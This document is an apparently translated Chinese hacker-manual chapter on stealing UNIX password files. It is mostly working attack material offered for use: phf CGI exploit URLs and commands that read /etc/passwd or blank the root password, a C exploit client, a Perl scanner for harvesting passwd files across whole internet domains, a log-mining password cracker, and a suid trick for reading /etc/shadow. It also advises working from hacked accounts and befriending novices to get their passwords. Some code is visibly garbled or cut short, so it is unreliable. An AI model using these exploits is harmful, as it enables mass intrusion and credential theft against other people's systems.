目录:
PHF:WWW的PH查询
PHF查询攻击新方法
从新手处获取
获取shadow密码档
获取/etc/hosts档
本文列举了几种从UNIX系统获取密码档的方法。其中大多数方法要求你拥有一个有效帐号;但也有不需帐号也可访问系统的方法。在这里你还能知道完整的密码档与shadow密码档的区别,并学习到如何读取shadow密码档。
PHF:WWW的PH查询
如果在WWW的cgi-bin的目录下有一个名为phf的可执行(具有x权限)程序,那麽你就可以通过WWW或LINUX的文本浏览器lynx访问它。该功能允许你读取系统上的文件,如/etc/passwd等,并保存在本地机上。
以下是我们所需要做的。如果httpd服务器是由root根用户运行的,通过使用phf,我们可以成为该服务器的root用户;甚至修改服务器上某个用户的密码。
这里有一个perl脚本,它对使用上一章中的getdomain.pl脚本所得到的结果进行检测,并检查运行服务器的用户。如果是root用户,它就记录其id;如果不是root用户,则会自动从/etc目录下读取passwd档,并保存为domain.???.passwd文件。
我还会给出另一个脚本,它允许你从一个shell中运行一条命令。只要该系统有phf,你就可以在shell中输入一命令行,通过管道命令传送到远程系统上执行。
OK。现在你该知道下一步是什麽了?让我们来学习如何利用phf。
把你最喜爱的web浏览器或是UNIX系统中经常使用的lynx文本浏览器连接到网络上。
在浏览器窗口或屏幕出现後,踺入g(译者注:即使用浏览器的「go」功能)。便会出现以下内容(译者注:以lynx为例):
URL to open:
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
在URL to open: 处输入:h++p://xxx.org/cgi-bin/phf/?Qalias=xid
URL to open: h++p://xxx.org/cgi-bin/phf/?Qalias=xid
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
返回如下内容:
QUERY RESULTS
/usr/local/bin/ph -m alias=x id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
以上内容表明:运行服务器的用户是nobody。因此,我们便成为了该服务器的nobody用户。虽然我们还不是root用户,但必将是。 ;-)
命令行:
h++p://afp.org/cgi-bin/phf/?Qalias=xid
id是一个命令,它要求服务器返回用户的id。有时我们需要给出全路径,比如:h++p://afp.org/cgi-bin/phf/?Qalias=x/usr/bin/id
注意%0a後面是命令行内容。如果你想输入一个空格符,就要用%20代替,以下是经常要用到的几个命令行:(以%0a开始)
显示passwd密码档:
%0a/bin/cat%20/etc/passwd
获取/etc目录下所有以pass开始的详细文件列表:
%0als%20-al%20/etc/pass*
如果你有访问http的root用户权限,备份passwd文件为passwd.my文件:
%0acp%20/etc/passwd%20/etc/passwd.my
更改root用户密码(服务器往往会允许你这样做 ;-) ):
%0apasswd%20root
(以上命令可以让你在以root用户登录时不需输入密码,(译者注:也就是更改root用户的密码为空,然後再telnet该主机。)别忘了将passwd.my恢复为passwd(译者注:恢复root用户的旧密码),删除备份文件,然後你就可以运行一个合适的shell,并将其隐藏起来作为嗅探器(sniffer)来获取所需的密码了。)
只要你知道如何在UNIX中输入命令,同时没有忘记使用%20来代替空格符,你就不会遇到什麽困难!
OK。现在让我们来获取本例中的passwd档吧。;-)
URL to open: h++p://xxx.org/cgi-bin/phf/?Qalias=xcat+/etc/passwd
我们将会看到:
QUERY RESULTS
/usr/local/bin/ph -m alias=x cat /etc/passwd
root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:%2A:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
(一个小小的密码档 ;-) )
如果你希望保存这个文件,只要在文本浏览器中选择「打印」和「保存
为文件」即可。
现在让我们了解一下paaswd档的结构:
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1 :2 :3 :4 :5 :6 :7
1=用户名 2=被加密的密码 3=用户标识 4=用户组id 5=真实名字 6=用户根目录 7=shell
好。假设你不想使用WWW浏览器,编译并执行以下脚本也可以达到目的:
phf.c
------ cut here----
/* Some small changes for efficiency by snocrash. */
/*
* cgi-bin phf exploit by loxsmith [xf]
*
* I wrote this in C because not every system is going to have lynx. Also,
* this saves the time it usually takes to remember the syntatical format
* of the exploit. Because of the host lookup mess, this will take
* approximately 12 seconds to execute with average network load. Be patient.
*
*/
#include
#include
#include
#include
#include
#include
#include
int main(argc, argv)
int argc;
char **argv;
{
int i = 0, s, port, bytes = 128;
char exploit[0xff], buffer[128], hostname[256], *command, j[2];
struct sockaddr_in sin;
struct hostent *he;
if (argc != 3 && argc != 4) {
fprintf(stderr, "Usage: %s command hostname [port]", argv[0]);
exit(1);
}
command = (char *)malloc(strlen(argv[1]) * 2);
while (argv[1] != ';';) {
if (argv[1] == 32) strcat(command, "%20"; else {
sprintf(j, "%c", argv[1]);
strcat(command, j);
}
++i;
}
strcpy(hostname, argv[2]);
if (argc == 4) port = atoi(argv[3]); else port = 80;
if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) {
he = gethostbyname(hostname);
if (he) {
sin.sin_family = he->h_addrtype;
memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0],
he->h_length);
} else {
fprintf(stderr, "%s: unknown host %s\n", argv[0], hostname);
exit(1);
}
}
sin.sin_family = AF_INET;
sin.sin_port = htons((u_short) port);
if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: could not get socket\n", argv[0]);
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
close(s);
fprintf(stderr, "%s: could not establish connection\n", argv[0]);
exit(1);
}
sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s\n", command);
free(command);
write(s, exploit, strlen(exploit));
while(bytes == 128) {
bytes = read(s, buffer, 128);
fprintf(stdout, buffer);
}
close(s);
}
-------- cut here
使用举例:
bash% phf id xxx.org
------
Query Results
/usr/local/bin/ph -m alias=X
id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
;
close(FILE);
# Open output file.
open(OUTFILE, ">>GetURLResults" or die("GetURL: Cannot open output file.\n";
my($url)="";
foreach $url (@URLs) {
print ("Now checking: $url";
chomp($url);
$result = `$program h++p://$/cgi-bin/phf?Qalias=x/usr/bin/id`;
print OUTFILE ("\n============ $url ============\n";
foreach (split(/\n/, $result)) {
print OUTFILE ("$_\n";
}
if ($result =~ m/id=/i) {
if ($result =~ m/root/i) {
print ("Logging root response.\n";
} else {
print ("Got ID response, getting /etc/passwd...";
$result = `$program h++p://$/cgi-bin/phf?Qalias=x/bin/cat+/etc/passwd`;
# Output results to file named .passwd;
local($domainfilename)="";
$domainfilename = $url;
if (open(PASSWDFILE, ">$.passwd") {
print PASSWDFILE ("\n";
foreach (split(/\n/, $result)) {
print PASSWDFILE ("$_\n";
}
close(PASSWDFILE);
print ("Done! [$domainfilename].\n";
} else {
print ("FAILED! [$domainfilename].\n";
}
}
}
}
# We are done. Close the output file and end the program.
close (OUTFILE);
0;
�
------------- cut here
OK。这很简单吧。如果你定义了自己的域名文件urls,也可以使用geturl.pl。
以下是脚本文件说明:
这个轻巧的工具非常容易使用。它可以帮助你取得root用户权限和从不同的domain获取passwd密码档。
geturl.pl试图记录Internet上每台domain对phf的响应结果。你可以选择.com .edu.org .mil .gov或是需要探测的IP地址列表。一旦发现具有root权限的用户,便在结果文件中记录uid=root,然後继续探测下一台domain。如果phf探测器找到的用户没有root权限,它就会读取该domain上的passwd密码档,并在当前目录下以domain.???.passwd文件名保存。
以下是此工具的使用说明:
ftp到rs.internic.net站点
在domain目录下寻找:
com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
下载这些文件并对目标主机所属域名文件运行getdomain.pl,如:
perl getdomain.pl com.zone com >com.all
该脚本会分析出.com域的所有主机名并输出到文件com.all中。
如果希望分析.edu域,输入:
perl getdomain.pl edu.zone edu >edu.all
你便会有一个供geturl.pl使用的文件edu.all。
使用geturl.pl的格式如下:
geturl.pl
用edu.all或com.all代替
如果你定义了域名文件urls,运行geturl.pl时不需。
运行结果被记录到当前目录下的GetURLResults文件中。
1. geturl.pl使用lynx进行搜索(lynx要在查找路径中)。
2. 如果geturl.pl发现在一个url的httpd上获得了root权限,就会记录该root用户。
如果http用户不是root,但该用户具有在http上执行phf权限,就会抓取该domain的passwd档,并以fulldomainname.passwd的文件保存到当前目录下。
3. 你也可以提供包含了IP地址列表的文件供geturl.pl使用。
4. 我使用的是OS/2的lynx和perl,在长文件名方面没有遇到问题。我在UNIX机进行了测试,该程序也可以正常工作。
你需要:
1. Perl在查找路径中
2. Lynx在查找路径中
3. 长文件名(256字符)支持(如UNIX或OS/2)
4. 本文所列出和包含的所有文件
5. 从Internic站点下载的域名文件或自行制作的url或IP列表文件(取名为urls,
运行时仅输入geturl.pl)
注意事项:
如果你有一个现金付费的互联网帐号或通过hack而得到的帐号使用此工具来获取成果,那就最好了。然後便可以用另一个安全的帐号使用你的劳动成果了。但我并不必警告你这些,对吧?我对这些工具并不觉得羞耻。这里提供的工具是让你们检查domain的安全性。;-)
getdomain.pl: 分析.org .com .edu .mil .gov等internic域名文件
geturl.pl: 检测并记录每一台domain的响应结果
GetURLResults: geturl.pl程序的结果记录文件
这里还有另外一种方法:
如果你能读取/var/adm/messages文件,或许你能轻而易举地得到一些用户的密码!
我曾经采用这种方法获得过root用户的密码!
还记得有多少次你是急着登录的吗?你可能因此而在login:里输入了密码:这种事情是很容易发生的。这样你就会出现两次登录失败,系统就在这个时候胡所动作了。
例如:(假设你很急着登录而没有留意屏幕)
Login: (你踺入回车(而你此时并不知道))
Password: (你以为现在开始登录了,便输入用户名)
Login: (然後输入用户密码)
此时系统会在messages文件中产生如下记录:
Login: (这里是你的用户密码!!!)
Password ****** (系统当然不会给你看见密码了!?但由於你在Login:处输入了
用户密码,只要我们有读取messages文件的权限,就会得到用户密码,并供crackerjack
运行(以找出对应的用户)。如果是在一个小型系统,或许...就是root密码!;-))
以上这些工作可以由以下脚本轻易完成!
对於Quantum的bindwarez文件,你可以在附录中找到。
------------ cut here
#!/bin/sh
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
#
# h++p://www.escape.com/~daveg
echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$
grep "LOGIN FAILURE" /var/log/messages | cut -d';,'; -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$
if [ ! -e ./scrack ]
then
echo "Creating scrack.c"
cat << ! > scrack.c
#include
#include
#include
#include
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
struct passwd *pwd;
FILE *fp;
char buff[80], salt[3], *encrypted_string;
if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
{
fprintf( stderr, "Couldnt find dict file\n" );
exit(1);
}
while ( fgets( buff, 80, fp ) != NULL )
{
setpwent();
buff[strlen(buff)-1]=';';;
while ( ( pwd = getpwent() ) != NULL )
{
if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
( strlen( (*pwd).pw_passwd ) == 13 ) )
{
get_salt(salt, (*pwd).pw_passwd );
encrypted_string = crypt( buff, salt );
if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
{
fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
fflush(stdout);
}
}
}
}
}
!
echo "Creating scrack"
cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi
./scrack /tmp/messages.dict.$$
echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.
------ cut here
--------------------------------------------------------------------------------
从新手处获取
好。重复一次,这是获取密码的另一种方法。只要按照第二章所谈到的相关
内容去做就行了。运用你的智慧去与那些尚未成熟的「新手」交朋友吧。;-)
对了。在阅读本手册前,你可能曾经也是别人的「新手」朋友呢!;-)
--------------------------------------------------------------------------------
获取shadow密码档
什麽是shadow密码档呢?
举个例子,如果你利用上述方法取回来的passwd档,其内容如下:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0perator:/root:/bin/bash
games:x:12:100:games:/usr/games:
man:x:13:15:man:/usr/man:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:x:-2:100:nobody:/dev/null:
ftp:x:404:1::/home/ftp:/bin/bash
guest:x:405:100:guest:/dev/null:/dev/null
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
是不是少了点东西?噢,被加密的密码。如果你有root权限,就会在/etc/shadow中找到这些被加密的密码。某些系统管理员会将shadow档隐藏到其他隐蔽的目录下。但多数情况下,你可以在/etc目录下找到。有一些shadow程序会将密码保存到master.passwd文件中。但只要你有root权限,总有地方可以找到它。
现在,假设你有一个有效帐号,但没有root权限。
如果主机使用的是libc5.4.7(多数系统都使用它 ;-) ),而且下列文件之一要求
必须有suid权限:
ping, traceroute, rlogin, or, ssh
1. 输入bash或sh以启动一个bash shell
2. 输入: export RESOLV_HOST_CONF=/etc/shadow
3. 输入以上文件名之一,并加上asdf参数,如:
ping asdf
如果一切正常,你就会得到shadow密码档。
这个方法对於我这几天在许多系统中进行的测试均很有效。
注:你可用所希望读取的文件名(文件拥有者是root)来取代/etc/shadow。
以下脚本可以让你轻而易举地读取所需要的文件:
rcb.c
-------- cut here
/* RCB Phraser - therapy in ';96
* Limits: Linux only, no binary files.
* little personal message to the world: FUCK CENSORSHIP!
*/
#include
void getjunk(const char *filetocat)
{ setenv("RESOLV_HOST_CONF",filetocat,1);
system("ping xy 1> /dev/null 2> phrasing";
unsetenv("RESOLV_HOST_CONF";
}
void main(argc,argv)
int argc; char **argv;
{ char buffer[200];
char *gag;
FILE *devel;
if((argc==1) || !(strcmp(argv[1],"-h") || !(strcmp(argv[1],"--help"))
{ printf("RCB Phraser - junked by THERAPY\n\n";
printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
exit(1);
}
getjunk(argv[1]);
gag=buffer;
gag+=10;
devel=fopen("phrasing","rb";
while(!feof(devel))
{ fgets(buffer,sizeof(buffer),devel);
if(strlen(buffer)>24)
{ strcpy(buffer+strlen(buffer)-24,"\n";
fputs(gag,stdout);
}
}
fclose(devel);
remove("phrasing";
}
-------------- cut here
命令行:rcb /etc/shadow (或其他你在这个系统中不能读取的文件。;-) )
--------------------------------------------------------------------------------
获取/etc/hosts档
需要注意的是,有时你需要知道有哪些系统在hosts文件中,或在这个系统中有哪些其他domain和所有的IP地址,因此,不要忘了读取/etc/hosts文件以获得以後你可能需要的资料
|
